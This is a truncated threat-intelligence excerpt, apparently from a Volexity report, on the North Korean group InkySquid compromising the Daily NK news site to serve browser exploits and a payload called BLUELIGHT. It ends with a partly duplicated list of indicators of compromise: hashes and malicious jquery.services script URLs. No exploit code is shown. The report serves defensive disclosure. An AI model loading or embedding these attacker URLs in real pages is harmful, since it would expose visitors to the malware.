North Korean APT InkySquid Infects Victims Using Browser Exploits
Contents
North Korean APT InkySquid Infects Victims Using Browser Exploits
August 17, 2021
Volexity recently investigated a strategic web compromise (SWC) of the website of the Daily NK (www.dailynk[.]com), a South Korean online newspaper that focuses on issues relating to North Korea. Malicious code on the Daily NK website was observed from at least late March 2021 until early June 2021.
This post provides details on the different exploits used in the SWC, as well as the payload used, which Volexity calls BLUELIGHT. Volexity attributes the activity described in this post to a threat actor Volexity refers to as InkySquid, which broadly corresponds to activity known publicly under the monikers ScarCruft and APT37.
SWC Activity
In April 2021, through its network security monitoring on a customer network, Volexity identified suspicious code being loaded via www.dailynk[.]com to malicious subdomains of jquery[.]services. Examples of URLs observed loading malicious code include the following:
hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
These URLs lead to legitimate files used …
August 17, 2021
Volexity recently investigated a strategic web compromise (SWC) of the website of the Daily NK (www.dailynk[.]com), a South Korean online newspaper that focuses on issues relating to North Korea. Malicious code on the Daily NK website was observed from at least late March 2021 until early June 2021.
This post provides details on the different exploits used in the SWC, as well as the payload used, which Volexity calls BLUELIGHT. Volexity attributes the activity described in this post to a threat actor Volexity refers to as InkySquid, which broadly corresponds to activity known publicly under the monikers ScarCruft and APT37.
SWC Activity
In April 2021, through its network security monitoring on a customer network, Volexity identified suspicious code being loaded via www.dailynk[.]com to malicious subdomains of jquery[.]services. Examples of URLs observed loading malicious code include the following:
hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
These URLs lead to legitimate files used …
IoC
558ce5e8c0b1b0a76b88db087f0c92f7a62716fe
5c430e2770b59cceba1f1587b34e686d586d2c8ba1908bb5d066a616466d2cc6
9b86888a83dd0dd1c3a0929f1ea53b82
http://jquery.services
http://www.dailynk.com
https://storage.jquery.services/log/history
https://ui.jquery.services/responsive-extend.min.js
https://ui.jquery.services/slider.min.css
https://ui.jquery.services/swipeout.min.css
https://ui.jquery.services/swipeout.min.js
https://www.dailynk.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
https://www.dailynk.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
5c430e2770b59cceba1f1587b34e686d586d2c8ba1908bb5d066a616466d2cc6
9b86888a83dd0dd1c3a0929f1ea53b82
http://jquery.services
http://www.dailynk.com
https://storage.jquery.services/log/history
https://ui.jquery.services/responsive-extend.min.js
https://ui.jquery.services/slider.min.css
https://ui.jquery.services/swipeout.min.css
https://ui.jquery.services/swipeout.min.js
https://www.dailynk.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
https://www.dailynk.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1